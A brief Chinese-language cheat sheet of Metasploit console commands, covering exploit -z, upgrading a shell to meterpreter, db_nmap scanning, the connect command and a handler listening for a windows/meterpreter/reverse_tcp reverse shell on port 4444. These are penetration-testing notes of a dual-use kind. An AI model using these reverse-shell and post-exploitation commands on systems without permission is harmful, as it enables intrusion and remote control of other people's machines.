Metasploit实战技巧
exploit-z
表示在完成 exploit 之后不会与会话进行交互。完成 exploit 之后,可以使用 sessions 查看会话信息。
session -u ID
将shell转变为meterpreter
db_nmap -sT -sV 192.168.0.103 -p 1433 扫描目标
使用 hosts 和 services 进行主机查看与服务查看
在 Metasploit 中使用 load minion 加载插件
connect 参数,类似于 netcat 功能
connect 192.168.1.5 555 可以直接连接主机的指定的端口
handler 命令
handler -p windows/meterpreter/reverse_tcp -H IP -P 4444
监听该ip的特定端口
sessions -i ID -n 会话名称
修改会话名称 区分不同会话

